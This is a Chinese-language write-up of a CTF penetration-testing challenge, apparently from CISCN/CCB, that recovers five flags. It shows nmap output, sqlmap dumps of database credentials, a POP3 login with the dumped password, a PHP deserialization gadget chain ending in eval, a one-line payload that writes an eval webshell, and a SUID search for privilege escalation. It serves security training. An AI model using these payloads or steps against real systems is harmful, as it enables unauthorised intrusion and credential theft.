本文最后更新于 2025年3月18日 上午
ciscn&ccb-ISW 渗透 web-git
前言:个人打的最多的一个机子,赛后向学长和师傅要了wp整理复盘了一下
1
2
| 题目共包含五处flag
172.16.160.40
|
正常的思路是先进行nmap和dir
nmap扫到了以下目录
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
| 25/tcp open smtp Postfix smtpd
|_smtp-commands: work.com, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34)
| http-git:
| 172.16.160.40:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: flag commit
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Gitlab
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34
110/tcp open pop3 Dovecot pop3d ([XCLIENT])
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after: 2023-11-28T16:40:31
| MD5: e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_pop3-capabilities: CAPA PIPELINING RESP-CODES STLS UIDL AUTH-RESP-CODE TOP SASL(PLAIN) USER
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
143/tcp open imap Dovecot imapd
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after: 2023-11-28T16:40:31
| MD5: e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: Pre-login listed post-login have SASL-IR ENABLE LOGIN-REFERRALS more capabilities LITERAL+ STARTTLS ID IMAP4rev1 IDLE AUTH=PLAINA0001 OK
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Gitlab
| http-git:
| 172.16.160.40:443/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: flag commit
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T09:02:14
| Not valid after: 2023-11-18T09:02:14
| MD5: 3c47:9ba9:c35e:d7da:dd8d:92b8:5653:3f9e
|_SHA-1: 67dc:6f7f:f385:fe12:d7a8:9d88:df12:b572:97db:f35a
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: Pre-login post-login have SASL-IR ENABLE LOGIN-REFERRALS more listed capabilities LITERAL+ ID AUTH=PLAINA0001 IDLE IMAP4rev1 OK
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after: 2023-11-28T16:40:31
| MD5: e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d ([XCLIENT])
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after: 2023-11-28T16:40:31
| MD5: e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_pop3-capabilities: CAPA UIDL SASL(PLAIN) AUTH-RESP-CODE TOP RESP-CODES USER PIPELINING
|_ssl-date: TLS randomness does not represent time
3306/tcp open mysql MySQL (unauthorized)
9999/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: 403 Forbidden
|
flag1
根据信息是有git的,使用githack进行恢复,其中有一个flag.php,其中显示的是no here,可以使用git log进行查询
对1d那条信息进行reset恢复,可以拿到flag1
flag2
根据443端口,常见的考点是改hosts,同时直接访问ip的9999端口是不能进行访问的,查看前端的网页源码是有给
修改以下hosts
前端通过目录扫描存在/login.html,可以直接绕过,尝试直接sqlmap进行爆库内容
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| +----+-------+--------+---------+----------------------------------+
| id | icon | name | address | password |
+----+-------+--------+---------+----------------------------------+
| 1 | 1.jpg | admin | 123123 | 64e39c60d69afe351b48472307add2c5 |
+----+-------+--------+---------+----------------------------------+
[13:44:35] [INFO] table 'mail.`admin`' dumped to CSV file 'C:\Users\0raN9e\AppData\Local\sqlmap\output\172.16.160.40\dump\mail\admin.csv'
[13:44:35] [INFO] fetching columns for table 'user' in database 'mail'
[13:44:35] [INFO] retrieved:
[13:44:35] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
5
[13:44:37] [INFO] retrieved: id
[13:44:43] [INFO] retrieved: username
[13:45:06] [INFO] retrieved: email
[13:45:19] [INFO] retrieved: login_time
[13:45:56] [INFO] retrieved: password
[13:46:24] [INFO] fetching entries for table 'user' in database 'mail'
[13:46:24] [INFO] fetching number of entries for table 'user' in database 'mail'
[13:46:24] [INFO] retrieved: 1
[13:46:25] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
ryan@work
[13:46:56] [INFO] retrieved: 1
[13:46:58] [INFO] retrieved: 2019-08-07 13:00:00
[13:48:04] [INFO] retrieved: circumstances
[13:48:39] [INFO] retrieved: ryan
Database: mail
Table: user
[1 entry]
+----+-----------+---------------+----------+---------------------+
| id | email | password | username | login_time |
+----+-----------+---------------+----------+---------------------+
| 1 | ryan@work | circumstances | ryan | 2019-08-07 13:00:00 |
+----+-----------+---------------+----------+---------------------+
|
重置ryan 邮箱
nc 连接登录 ryan/circumstances,收到邮件。
里面告诉了具体修改的内容,提醒你。然后在gitlab.example.com:9999/root/web/-/blob/main/user.php,最下面注释里藏有flag2
flag3
敏感pop3邮件,在邮件里藏有信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| └─$ nc 172.16.160.40 110
+OK [XCLIENT] Dovecot ready.
user ryan
+OK
pass circumstances
+OK Logged in.
list
+OK 1 messages:
1 1633
.
retr 1
+OK 1633 octets
Return-Path: <Amanda@work.com>
X-Original-To: ryan@work.com
Delivered-To: ryan@work.com
Received: from LAPTOP-N2NBA1RK (LAPTOP-N2NBA1RK [192.168.31.58])
by work.com (Postfix) with ESMTP id 28B1C21E2F35
for <ryan@work.com>; Mon, 3 Feb 2025 18:08:58 +0800 (CST)
Date: Mon, 3 Feb 2025 10:08:58 +0800
From: "Amanda@work.com" <Amanda@work.com>
To: ryan <ryan@work.com>
Subject: flag
X-Priority: 3
X-Has-Attach: no
X-Mailer: Foxmail 7.2.23.121[cn]
Mime-Version: 1.0
Message-ID: <202502031008578820300@work.com>
Content-Type: multipart/alternative;
boundary="----=_001_NextPart335171644650_=----"
This is a multi-part message in MIME format.
------=_001_NextPart335171644650_=----
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: base64
ZmxhZzN7dmxnZThyZnEwYmFxYjZzNGduMjd5NWs5cnd1cjk5YjZ9DQoNCg0KDQpBbWFuZGFAd29y
ay5jb20NCg==
------=_001_NextPart335171644650_=----
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
<html><head><meta http-equiv=3D"content-type" content=3D"text/html; charse=
t=3Dus-ascii"><style>body { line-height: 1.5; }body { font-size: 14px; fon=
t-family: "Microsoft YaHei UI"; color: rgb(0, 0, 0); line-height: 1.5; }</=
style></head><body>=0A<div><span></span>flag3{vlge8rfq0baqb6s4gn27y5k9rwur=
99b6}</div>=0A<div><br></div><hr style=3D"WIDTH: 210px; HEIGHT: 1px" color=
=3D"#b5c4df" size=3D"1" align=3D"left">=0A<div><span><div style=3D"MARGIN:=
10px; FONT-FAMILY: verdana; FONT-SIZE: 10pt"><div>Amanda@work.com</div></=
div></span></div>=0A</body></html>
------=_001_NextPart335171644650_=------
|
pop3藏有flag3
flag4
坊间的两种思路
思路1
在进行目录扫描的时候在/assets/scripts/下面存在pass.php,可以直接getshell
使用grep -r -n flag查找flag,得到flag4
思路2
在之前的目录扫描里/backup/www.zip存在文件sqlhelper.php,内容如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
| <?php
class sqlhelper{
private $mysqli;
private static $host="127.0.0.1";
private static $user="root";
private static $pwd="******";
private static $db="mail";
public function __construct()
{
$this->mysqli= new mysqli(self::$host,self::$user,self::$pwd,self::$db);
if($this->mysqli->connect_error){
die("链接失败".$this->mysqli->connect_error);
}
$this->mysqli->query("set names utf8");
}
public function execute_dql($sql){
$res=$this->mysqli->query($sql) ;
return $res;
}
public function execute_dml($sql){
$res=$this->mysqli->query($sql) ;
if(!$res){
return 0;
}else{
if($this->mysqli->affected_rows>0){
return 1;
}else{
return 2;
}
}
}
public function close_sql(){
$this->mysqli->close();
}
}
if (isset($_POST['un']) && isset($_GET['x'])){
class allstart
{
public $var1;
public $var2;
public function __construct()
{
$this->var1=new func1();
}
public function __destruct()
{
$this->var1->test1();
}
}
class func1
{
public $var1;
public $var2;
public function __construct()
{
$this->var1=new func2();
}
public function test1()
{
$this->var1->test2();
}
}
class func2
{
public $var1;
public $var2;
public function __construct()
{
$this->var1=new func3();
}
public function __call($test2,$arr)
{
$s1 = $this->var1;
$s1();
}
}
class func3
{
public $var1;
public $var2;
public function __construct()
{
$this->var1=new func4();
}
public function __invoke()
{
$this->var2 = "concat string".$this->var1;
}
}
class func4
{
public $str1;
public $str2;
public function __construct()
{
$this->str1=new toget();
}
public function __toString()
{
$this->str1->get_flag();
return "1";
}
}
class toget
{ public $todo;
public function __construct()
{
$this->todo="system('ls');";
}
public function get_flag()
{
eval($this->todo);
}
}
unserialize($_POST['un']);
}
?>
|
直接new一个allstart就可以调用链子,在
1
| $this->todo="system('ls');";
|
进行修改,尝试写马进去
1
| "file_put_contents('/var/www/html/1.php','<?php eval(\$_POST[1]);');";
|
之后的思路一致
flag5
进行提权
可以使用
1
| find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
|
在tmp目录下有一个del.py,可以利用该文件进行修改提权
flag则在/root 目录下的aim.jpg